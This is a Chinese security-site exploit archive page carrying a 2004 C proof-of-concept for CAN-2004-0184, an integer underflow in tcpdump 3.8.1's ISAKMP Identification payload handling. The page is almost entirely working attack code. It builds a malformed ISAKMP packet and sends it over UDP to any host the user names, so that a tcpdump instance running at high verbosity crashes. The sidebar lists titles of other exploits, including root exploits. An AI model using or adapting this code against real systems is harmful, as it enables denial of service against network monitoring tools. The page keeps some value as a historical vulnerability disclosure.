首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Tcpdump ISAKMP payload Integer underflow Exploit
来源:www.simphalempin.com 作者:Remi 发布时间:2004-04-12  

Tcpdump ISAKMP Identification payload Integer underflow Exploit

/*
* tcpdump packet sniffer
* Integer underflow in ISAKMP Identification payload
* denial of service vulnerability
* proof of concept code
* version 1.0 (Apr 02 2004)
* CVE-ID: CAN-2004-0184
*
* by Remi Denis-Courmont < exploit at simphalampin dot com >
* www simphalempin com dev
* Remi Denis-Courmont is not responsible for the misuse of the
* source code provided hereafter.
*
* This vulnerability was found by:
* Rapid7, LLC Security Advisory - www rapid7 com
* whose original advisory may be fetched from:
* www rapid7 com advisories R7-0017 html
*
* Vulnerable:
* - tcpdump 3.8.1
*
* Not vulnerable:
* - tcpdump 3.8.3
*
* NOTES:
* The vulnerability cannot be exploited to cause a denial of service
* with the Debian's tcpdump packages as it was partly fixed as part of
* the fix for earlier known CAN-2003-0108 vulnerability, though the bug
* is still present. That may be the case for other vendors which were
* not investigated.
*
* tcpdump must be run with a verbosity level of at least 3:
* # tcpdump -vvv
* Otherwise, no denial of service will occur.
*/


#include <string.h>
#include <stdio.h>

#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>

#include <netdb.h>

static const char packet[] =
/* ISAKMP header */
"\x00\x00\x00\x00\x00\x00\x00\x00" /* Initiator cookie */
"\x00\x00\x00\x00\x00\x00\x00\x00" /* Responder cookie */
"\x05" /* Next payload: Identification */
"\x10" /* Version: 1.0 */
"\x01" /* Exchange type */
"\x00" /* Flags */
"\x00\x00\x00\x00" /* Message ID */
"\x00\x00\x00\x24" /* Length */

/* ISAKMP Identification payload */
"\x00" /* Next payload: none */
"\x00" /* Reserved */
"\x00\x05" /* Payload length (incorrect) */
"\x20" /* ID type (unknown) */
"\x00\x00\x00" /* DOI */
;

static int
send_evil_packet (const struct addrinfo *r)
{
int fd;
size_t len;

fd = socket (r->ai_family, r->ai_socktype, r->ai_protocol);
if (fd == -1)
{
perror ("Socket error");
return 1;
}

len = sizeof (packet) - 1;
if (sendto (fd, packet, len, 0, r->ai_addr, r->ai_addrlen) != len)
{
perror ("Packet sending error");
close (fd);
return 1;
}

puts ("Packet sent!");
close (fd);
return 0;
}


static int
proof (const char *hostname)
{
struct addrinfo *res;
int check;

{
struct addrinfo help;
memset (&help, 0, sizeof (help));
help.ai_socktype = SOCK_DGRAM;

check = getaddrinfo (hostname, "isakmp", &help, &res);
}

if (check == 0)
{
struct addrinfo *ptr;

for (ptr = res; ptr != NULL; ptr = ptr->ai_next)
check |= send_evil_packet (ptr);

freeaddrinfo (res);
return check;
}

fprintf (stderr, "%s: %s\n", hostname, gai_strerror (check));
return -1;
}


static void
usage (const char *path)
{
fprintf (stderr, "Usage: %s <hostname/IP>\n", path);
}


int
main (int argc, char *argv[])
{
puts ("tcpdump Integer underflow in ISAKMP Identification payload\n"
"proof of concept code\n"
"Copyright (C) Remi Denis-Courmont 2004 "
"<\x65\x78\x70\x6c\x6f\x69\x74\x40\x73\x69\x6d\x70"
"\x68\x61\x6c\x65\x6d\x70\x69\x6e\x2e\x63\x6f\x6d>\n");


if (argc != 2)
{
usage (argv[0]);
return 2;
}

return proof (argv[1]) ? 1 : 0;
}




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Remote Exploit for Aborior's E
·IGI 2 <= 1.3 server RCON fo
·RogerWilco 0.4 remote exploit
·Symantec Virus Detection Remot
·Proof-of-concept exploit code
·eMule <= 0.42d Remote Explo
·Monit <= 4.1 Remote Root Ex
·Remote Root Exploit for Monit
·Panda ActiveScan Control Remot
·IPFW ECE Firewall Bypassing Ex
·FirstClass Desktop 7.1 buffer
·Solaris Kernel Module Insertio
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved